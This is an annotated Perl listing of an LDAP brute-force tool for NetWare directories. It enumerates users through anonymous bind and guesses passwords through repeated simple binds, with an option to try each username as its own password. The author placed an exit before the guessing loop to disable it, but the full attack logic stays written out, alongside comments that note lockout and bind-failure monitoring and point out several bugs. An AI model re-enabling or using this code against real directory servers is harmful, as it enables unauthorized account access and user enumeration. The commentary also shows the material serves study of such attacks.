#!/usr/bin/perl
##########################################################################
##
## NetWare LDAP Brute by
## George Hedfors
##
## http://www.pinion.se
##
## Disclaimer: This program may only be used for educational purposes!
## Offensive parts of the script has been disabled.
##
#
# Reader notes on this listing:
#   * The page collapsed the script onto two physical lines; it is laid out
#     here one statement per line with the code tokens unchanged.
#   * There is no "use strict" / "use warnings": every variable except $dn
#     in mytry() is an undeclared package global shared by the top-level
#     code and both subs.
#   * Control flow: parse options -> optional anonymous user listing ->
#     load name and password lists -> unconditional exit. The bind loop
#     after that exit is unreachable in this listing.

# Switch is a source-filter module (not shipped with core Perl since 5.14);
# it supplies the dispatch construct used for option parsing below.
use Switch;
use Net::LDAP;

# Unbuffered STDOUT so progress text shows before each network call returns.
$| = 1;

print "NetWare LDAP Brute by George Hedfors @ Pinion\n";
print "[x] This program may only be used for educational purposes!\n";

# Hand-rolled option parsing. Options taking a value (-h -r -u -p -t) read
# $ARGV[$i+1] and skip it; flags (-s -e -n) only increment a counter.
# Nothing checks that a value actually follows the option, and unknown
# arguments are ignored silently.
for($i = 0; $i < @ARGV; $i++) {
    switch($ARGV[$i]) {
        case "-h" { $host = $ARGV[$i+1]; $i++; }
        case "-r" { $rootdn = $ARGV[$i+1]; $i++; }
        case "-u" { $usrs = $ARGV[$i+1]; $i++; }
        case "-p" { $pwds = $ARGV[$i+1]; $i++; }
        case "-t" { $port = $ARGV[$i+1]; $i++; }
        case "-s" { $ssl++; }
        case "-e" { $enumusr++; }
        case "-n" { $same++; }
    }
}

# A host is mandatory, plus either a user source (-u) or enumeration (-e).
if(!$host or (!$usrs and !$enumusr)) { usage(); }

# Default port follows the -s flag: 636 with it, 389 without.
if(!$port) {
    if($ssl) { $port = 636; } else { $port = 389; }
}

# Without -s the scheme is plain "ldap": nothing in this script then
# protects the connection, so any simple bind password travels unencrypted.
if($ssl) { $scheme = "ldaps"; } else { $scheme = "ldap"; }

if(!$rootdn) {
    print "[!] No Root DN. Assuming default 'o=hq'.\n";
    $rootdn = "o=hq";
}

# User listing via anonymous bind (-e).
# bind() with no arguments is an anonymous bind; result code 0 is success.
# The search is one level below the base DN for objectclass=person and
# keeps only entries that carry a uid attribute. It therefore returns
# nothing from a directory that refuses anonymous bind or does not let
# anonymous clients read person entries; that server-side restriction is
# the control this block tests for.
# No unbind is issued in this block; $ldap is simply reused later.
if($enumusr) {
    print "[*] Trying to enumerate users...";
    # NOTE(review): Net::LDAP documents $@ (not $!) as carrying the
    # constructor error, so the message may print an empty reason - confirm.
    $ldap = Net::LDAP->new($host, scheme => $scheme, port => $port) || die "\n\n[!] Unable to connect: $!\n";
    $mesg = $ldap->bind();
    if($mesg->code eq 0) {
        print " Anonymous bind worked!\n";
        $mesg = $ldap->search(base => $rootdn, scope => 'one', filter => '(|(objectclass=person))' );
        foreach ($mesg->entries) {
            if($_->exists('uid')) {
                # get_value in scalar context: only one uid per entry is kept.
                $u = $_->get_value('uid');
                # Spaces in the uid become underscores.
                $u =~ s/\ /\_/g;
                # @uarr keeps the original case for display; @users gets the
                # lower-cased form that later code works from.
                push(@uarr, $u);
                push(@users, lc($u));
            }
        }
        foreach (@uarr) { print "[+] " . $_ . "\n"; }
        # "eq" compares the element count as a string against "0".
        if(@users eq 0) {
            print "[!] No users enumerated.\n";
        } else {
            print "[*] " . @uarr . " user(s) enumerated.\n";
        }
    } else {
        print " failed.\n";
    }
}

# -u is treated as a file name first; if the open fails, the value itself is
# used as a single user name.
# The open is the two-argument form with a bareword handle, so the mode is
# parsed out of the same string as the command-line value; three-argument
# open with a lexical handle keeps mode and path separate.
# NOTE(review): the loop header below is empty as published on this page.
if($usrs) {
    if(open(IN, "< $usrs")) {
        while() {
            # Strips every "\n", "\r" and also every "|" character: inside a
            # bracketed class the bar is a literal, not alternation.
            $_ =~ s/[\n|\r]//g;
            push(@users, $_);
        }
        close(IN);
    } else {
        push(@users, $usrs);
    }
}

# The string literal below contains a raw line break exactly as it appears
# on this page.
if(!@users) {
    print STDERR "[!] 
No users, exiting.\n";
    exit;
}

# -p is read the same way as -u, but a failed open is not handled here;
# the bind loop further down falls back to using $pwds as a single value.
if($pwds) {
    if(open(IN, "< $pwds")) {
        while() {
            $_ =~ s/[\n|\r]//g;
            push(@passwds, $_);
        }
        close(IN);
    }
}

# Exits unless -n is set or @passwd is non-empty; note that the name tested
# here differs from the @passwds array filled above.
if(!@passwd and !$same) {
    print "\n[!] No passwords to try, exiting.\n";
    exit;
}

# Hard stop inserted by the author: the script always exits here, so the
# top-level code between this point and "sub usage" never runs.
print "\n[x] Offensive functions has been disabled!\n";
exit;

# ---- Unreachable in this listing (see the exit above) ----
# For each name: optionally try the name as its own password (-n), then each
# entry of @passwds, or the literal -p value when no list was loaded.
# Every attempt goes through mytry(), i.e. one new connection and one simple
# bind. On the directory side this shows up as a run of failed binds (LDAP
# result 49, invalidCredentials) against "cn=<name>, <base DN>" from a
# single client, which is the pattern bind-failure monitoring and account
# lockout policies are meant to catch.
print "\n[*] Starting brute...\n";
foreach $user (@users) {
    # Assigning the empty list leaves $ret undefined.
    $ret = ();
    if($same) { $passwd = $user; $ret = mytry(); }
    if($ret ne 1) {
        if(@passwds) {
            # Return values are ignored, so the list is not cut short after
            # a successful bind.
            foreach $passwd (@passwds) { mytry(); }
        } elsif($pwds) {
            $passwd = $pwds;
            mytry();
        }
    }
}
print "\n";
# "gt" is a string comparison of the element count against "0".
if(@working gt 0) {
    print "[*] Valid credentials:\n";
    foreach (@working) { print "[+] " . $_ . "\n"; }
}
exit;

# usage: print the option summary to STDERR and exit.
# The value placeholders after -h, -t, -r, -u and -p are blank on this page.
sub usage() {
    print STDERR "syntax: $0 [options]\n";
    print STDERR "\t-h \n";
    print STDERR "\t-t \tDefault: 389\n";
    print STDERR "\t-s\t\tLDAPS. Default port change to: 636\n";
    print STDERR "\t-r \tDefault: o=hq\n";
    print STDERR "\t-u \n";
    print STDERR "\t-p \n";
    print STDERR "\t-n\t\tTry same password as username.\n";
    print STDERR "\t-e\t\tEnumerate users.\n\n";
    print STDERR "\tNote: Bruteforcing LDAP is slow!\n\n";
    exit;
}

# mytry: one simple bind as "cn=$user, $rootdn" with $passwd.
# Takes no arguments; reads the package globals $user, $passwd, $host,
# $scheme, $port, $rootdn and $ssl set by the top-level code.
# Returns 1 on a successful bind (result code 0) after recording
# "user/password" in @working; returns an empty value on any other result.
# Only called from the unreachable loop above.
sub mytry() {
    print "[*] Trying " . $user . " / " . $passwd . "...";
    $ldap = Net::LDAP->new($host, scheme => $scheme, port => $port) || die "\n\n[!] Unable to connect: $!\n";
    # verify => "none" turns off server certificate checking for this TLS
    # step, so the client would accept any certificate and has no assurance
    # which server receives the bind password.
    # NOTE(review): with -s the connection was already opened using the
    # "ldaps" scheme, so this start_tls call looks redundant; its return
    # value is not checked - confirm against Net::LDAP behaviour.
    if($ssl) { $ldap->start_tls(verify => "none"); }
    my $dn = "cn=" . $user . ", " . $rootdn;
    # NOTE(review): port => $port is passed to bind(); it does not look like
    # a bind option - confirm against the Net::LDAP documentation.
    $mesg = $ldap->bind($dn, password => $passwd, port => $port );
    if($mesg->code ne 0) {
        # 49 is the LDAP invalidCredentials result and is treated as the
        # ordinary miss; any other non-zero code is printed.
        if($mesg->code ne 49) {
            print " disabled or unable to logon. Return (" . $mesg->code . ")\n";
        } else {
            print "\n";
        }
        # No unbind on this path; the handle is replaced on the next call.
        return;
    } else {
        print " OK!\n";
        $ldap->unbind;
        push(@working, $user . "/" . $passwd);
        return 1;
    }
}